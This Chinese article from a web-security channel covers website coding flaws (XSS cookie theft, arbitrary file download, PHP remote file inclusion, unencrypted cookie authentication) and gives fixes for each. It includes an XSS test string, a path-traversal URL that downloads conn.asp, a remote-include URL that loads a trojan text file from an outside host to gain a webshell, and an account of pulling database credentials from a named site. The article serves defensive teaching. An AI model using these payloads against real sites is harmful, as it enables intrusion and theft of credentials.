网络安全 频道

Web网站程序编写中的安全软肋

    (8 )XSS漏洞骗取cookies得到后台权限

    这里有一段简单的检测代码:<script>alert("测试");</script>
将这段代码插入到你的网站可以提交数据的地方,例如:留言本,论坛,新闻。等的标题位置,或者内容位置,提交后访问对应的留言或者文章,如果弹出窗口


    则说明这个位置存在Xss漏洞。关于xss的漏洞的详细说明和利用办法这里不具体了解了。我们就来说说它的危害。
    一个普通的xss代码可以用来挂马,但是一个精心构造的xss代码却可以用来渗透,盗取管理员cookies,然后在本地修改cookies从而得到后台权限。当然xss的功能之强大不仅限于此。我们所要知道的就是,一定要注意在网站程序编写过程中对代码和数据的过滤进行严格处理,用主动防御的一句话叫做“宁可错杀一千,也不放过一个“。
    另外提供一个解决方案:
    对用户的cookies进行加密处理,后台用户使用session验证。因为session是保存在服务器的。所以即使cookies被盗取,入侵者无法在session对象消失以前进行操作的话,也无法得到更深入的权限。

    (9 )任意文件下载漏洞

    典型的例子就是新云,由于下载文件时候允许从地址栏提交文件路径。导致用户可以构造路径下载网站数据库配置文件,从而得到后台权限。
例:
http://www.xxx.com/flash/downfile.asp?url=uploadfile/../../conn.asp
    这个漏洞同样出现在了黑客防线的网站上。黑客防线使用的程序是”乔客” CMS 3.0 通过这个漏洞,我们得到了数据库帐号密码。可惜是内网数据库,没有webshell的前提下我们无法进行深入的检测了。


 
    由此我们可以看出,任意文件下载漏洞有多么可怕.所以对编写下载网站程序的程序员提出下面几点注意事项:
    1. 下载文件路径保存进数据库,禁止外部提交
    2. 假如入侵者已经得到后台权限,或者在前台允许自己提交资源连接(自己构造一个conn.asp的下载路径)依然可以下载指定文件,所以一定要对文件路径进行过滤
    3. 对下载文件类型进行过滤,设置允许下载的格式

    (10) 远程包含漏洞
    这个漏洞够强悍,直接得到webshell,还好这个漏洞只存在于PHP中。我们来简单说明下漏洞形成原因:
    <?php
  include($include."/a.php");
 ?>
    $include已经设置好路径,但是我们可以通过构造一个路径来达到攻击的目的.
    比方说我们提交:
    http://www.xxx.com/index.php?include=http://www.ccc.com/muma.txt?
    就可以轻松获得一个webshell。解决办法是关闭全局变量。4.2版本以后都是默认关闭的,为了就是解决这个问题,所以也请广大服务器管理员注意跟新服务器上的第三方程序版本。

    (11 )使用未加密的cookies进行用户权限等级及权限验证
    有很多网站程序员图方便,和节约服务器资源,使用cookies来验证用户信息。导致入侵者可以通过修改本地cookies进行入侵。而session 对象虽然比较安全,但由于是保存在服务器上,30分钟不活动才会自动清理出内存,所以消耗资源非常大。相对折中的处理办法是:
    对于前台用户使用加密的cookies 而后台用户则使用session 这样一来不但提高效率和减少资源消耗,还提高了安全性。因为后台用户数量少,而且使用session也可以降低Xss的成功率。

0
相关文章